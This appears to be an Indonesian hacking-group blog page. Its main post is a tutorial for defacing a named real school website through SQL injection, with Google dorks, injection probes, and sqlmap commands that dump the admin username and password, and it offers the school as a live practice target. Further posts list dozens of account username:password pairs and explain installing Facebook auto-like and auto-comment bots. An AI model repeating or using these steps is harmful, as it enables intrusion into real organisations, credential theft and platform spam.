X-Code Indonesian HackingGroups: 02/01/2013

TUTORIAL SQL MAP DEFACE WEBSITE SEKOLAH

0 komentar Saturday, February 23, 2013

Halo para sobat Hackinggroups, kali ini saya akan menulis tentang Cara Deface Dengan SQL Injection yang dikenal dengan teknik SQLmap di BackTrack. Tools ini sudah ada di dalam File .ISO pada BackTrack.
Disini, saya menggunakan BackTrack 5 R3.
Pertama-tama, cari target yang vuln terhadap SQL Injection, berikut ini sedikit dork dari saya :

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=

Dan masih banyak lagi dork bertebaran di Google :D

Dalam Tutorial kali ini, saya akan menggunakan target salah satu Sekolah yang ada di Sidoarjo.

http://www.sman2sidoarjo.sch.id/

Untuk mengetahui Website tersebut Vuln atau tidak, silahkan tambahkan tanda ‘ (petik satu) setelah atau sebelum nomor id tersebut, bisa juga dengan menambahkan tanda - (minus) sebelum nomor id tersebut.

Contoh : http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5''

http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=’5

http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=-5

Jika target tersebut Vuln terhadap SQLi, maka akan muncul kira-kira seperti ini :

Jika sudah mendapatkan target, silahkan buka Terminal, kemudian ketikan perintah “cd /pentest/database/sqlmap” (tanpa tanda petik) kemudian Enter.

Kemudian akan muncul seperti ini.

Kemudian untuk mencari nama database, ketikkan “ ./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 --dbs” (tanpa tanda petik) kemudian Enter.

Kemudian akan muncul seperti ini :

Disana kita dapat menemukan 2 Database, yaitu information_schema dan sman2sidoarjo_sman2sda

Setelah kita mendapatkan Database tersebut, kita tulis “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase --tables” (tanpa tanda petik) kemudian Enter.

Setelah itu akan muncul beberapa Tabel.

Kemudian kita mencari Colums dengan cara mengetik “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --columns” (tanpa tanda petik) kemudian Enter.

Disini kita akan menjumpai beberapa Columns dari Tabel Admin.

Kemudian, untuk mengetahui isi dari Columns tersebut, kita ketikkan “./sqlmap.py -u http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --dump” (tanpa tanda petik) kemudian Enter.

Nah, kita sekarang sudah menemukan User + Pass Administrator dari Website tersebut :)

Jika sudah mendapatkan User + Pass, pasti Anda tau kan yang harus dilakukan ? :)

Nah, tinggal cari Login Adminnya deh :D

Caranya banyak kok di Google :)

Sekian dulu dari saya, saya ucapkan Terimakasih Banyak :)

Untuk yang ingin belajar SQL Map, silahkan menggunakan live target http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5

Read On

Pin It

auto followers 17 febuari 2013

0 komentar Saturday, February 16, 2013

auto followers 17 febuari 2013
ayo cpet sbelum suspend dan selesai ids nya
siapkan goloknya dlu ini klik buat msukin ids

cara buatnya

1. isi ursname kalian gk pke @
langsung ursname kalian contoh : idsfollowers
2. msukin ids di bawah ini di kotak
3. klik start
tunggu smpe bvnyak

Clayton3617:hrctkvpm74231

Shad4560:jvwkrqme85748
Akilah3588:hgeigmka33426
Flor4088:igycbgoi34989
Florrie3745:hvalaini88626
Renetta9987:ysrjltid76861
Robbi2901:flfcesiy50699
Junie2273:dnbqjqrv59582
Maryanne4844:kppfbaoh65342
Anniskjq49461:hgspivok31857
Charlyn9928:yclnsgjf20092
Layne7229:rwagljoy89938
Wen2872:fgvqpnpn34735
Belen9614:xejivrnq24534
Earlean9143:womyfhpu63776
Marlyn2342:dcsnhprt17208
Faye4442:jojtippi62210
Tiffanie8142:tulmfasf85490
Shad4542:jiksekof42088
Akilah3571:htsrsglb79766

Anjanette2756:euvsayme82644
Nancie1913:cqqitntw69559
Marcell4425:jcxcujrj18550
Sharell9411:xwtdalsx89710
Elnora7340:rubhdubv85514
Reiko8469:usalrqug78194
Micah2453:eatnyceq12784
Junie2266:dyaacwuw96779
Thomasina6184:ogqkdcul33476
Kareem3112:fehcqyus26153
Chantel6469:pakfmlwo13071
Shanell8727:vdwohhyk23272
Olene1326:apsbnnrr66710
Lauri4566:jmwmoejs54931
Lasandra2436:dnivkvgq59124
Janeeigo40684:cykntlhu98366
Barbie1936:cuccfhnj82402
Palma9455:xcqynjal19108
Marcela6492:pwgyibfb91072

Shanell8720:vukxosnl85310
Jermaine8369:uimxbugy39537
Roxanna3393:grqxrkrj74074
Shanel7505:sptfxmjd66503
Narcisa9637:xjuowhhr43757
Porfirio9236:wpecsbtt65466
Dolores9520:xjwwckvw45060
Marcy4348:juwioiwo82736
Sherrell7118:qpbeevxg66804
Kaycee2989:fxwgtiwm95874
Teena8573:vuctlhgh83409
Hashb77041:uhyxrcpf38656
Carollevx26594:gncxlaop57495
Ozell4246:jqwotumh69012
Nevada5217:lfpqfypl31333
Christel8888:vbtyxanv13809
Hiroko3902:igwxsxlh32648
Keshiaxjt93440:wlspywnw50172
Malvina9702:yaqxqhms10930

Read On

Pin It

cara gampang membuat bot

0 komentar

add dlu fb ku yang membuat klik ini untuk add
dan add ni adminnya : my admin

kalo udh add langsung lanjut yah oke
cuma simple aja kok caranya

DOWNLOAD DISINI LINK BUAT BOT download bot disini

cara penggunaan :

Cara Menggunakan Bot Desktop

Banyak yang bertanya bagaimana cara menggunakannya. Caranya cukup mudah, tinggal klik klik saja.
Langsung saja saya kasih caranya berupa gambar,,

Tekan F lalu login seperti biasa. Tidak usah takut ada jebakan betmen. Karna tools ini sudah ada versi-versi sebelumnya.

Tampilan setelah login,

Klik gambar setting, lalu setting semau anda.. ini settingan aku..
dan comentnya..

jangan lupa ke status aku yah,,, d[$,#]b

mau statusmu dilike banyak orang...
http://rizky-charger.blogspot.com/2011/10/fb-auto-comment-like-v413-beruang-kutub.html

hehehe iklankan sedikit...

JIKA TIDAK BERJALAN HARAP INSTAL IE 8 atau 9
Download IE 8/9

Read On

Pin It

Membuat BOT Coment Full Versi Dengan Host Gratis (tutorial)

1 komentar

Nah Sahabat Mwb Postingan jeyek Nih biggrin

Blog Yg sya bawahkan adalah bot comen
Ke Topik Aja Deh !!
Nah Sekarang Saya Mau Ngasih Tutorial Membuat BOT Fb biggrin

Mungkin Agak Ribet Karena Cuma Hostingan Ini Yg Suport BOT tapi Gampang kok biggrin

Pertama Step by Step !
1 . Daftar Domain Dulu DISINI

2 . Kalo Sudah Membuat domain Nya Kita Daftar Hostinganya DISINI Atau Langsung Daftar DISINI AJA

3 . Silahkan Masukan Domain Mu Tadi Lalu "CLIK TO CONTINUE"

4 . Nah Kalo Sudah Kamu Scrhol Kebawah Lalu Klik "CHEKOUT"

5 . Silahkan Isi Formulir Pendaftaranya lalu clik "ORDER"

6 . Silahkan Cek Email Kamu Nanti Dikirim 3 Email Di Antara 1 Nya Berisi Data" Cpanel Yg Kamu Daftar Tadi biggrin

7 . Kalo Masih Gx Kekirim Kamu Ke Home Hostingan Nanti Ada Hallow Agan ! Klik Aja Terus Klik Lagi Email Send ! Disitu Jga Ada Data" nya

8 . Nah Kamu Nanti Cari NS Nya Lalu Ke Domain TK mu Isi Di Costum DNS Lalu Masukan NS nya di Costum DNS Domain Mu
Contoh :
Nameserver 1: ns1.dobelhost.com IP 111.68.116.132
Nameserver 2: ns2.dobelhost.com IP 111.68.116.140
Nameserver 3: ns3.dobelhost.com IP 111.68.116.163
Nameserver 4: ns4.dobelhost.com IP 111.68.116.164

9 . Kamu Masuk Ke FTP DISINI

10 . Jika Sudah Masuk Pilih Folder " Public_Html" Lalu Upload Link Berikut => gstoneys.com/instal.txt

11 . Nah Kalo Sudah Di Import Kamu Rename Jadi instal.php Terus Kamu Buka www.domainmu.com/instal.php

12 . Silahkan Kamu Isi Email Sama Pass Fb Kamu Untuk Menginstal BOT ! Nanti Ada Pengaturan BOT Yg Mau di OFF / ON kan !

13 . Kamu Buat Cronjob Nya

14 . Buat Cronjob Nya DISINI GAN
15 . Buat Cronjob Seperti Ini Di Situs Tadi

=> www.domainmu.com/cron1.php
=> www.domainmu.com/cron2.php
=> www.domainmu.com/cron3.php
=> www.domainmu.com/mycron1.php
=> www.domainmu.com/mycron5.php

Waktu Every 5 Minutes Semua biggrin

Beres Deh GOOD LUCK ya biggrin

Ane Juga Pegel Ngetik Nya . xD

Jangan Lupa Follow Ntar Ane Folback smile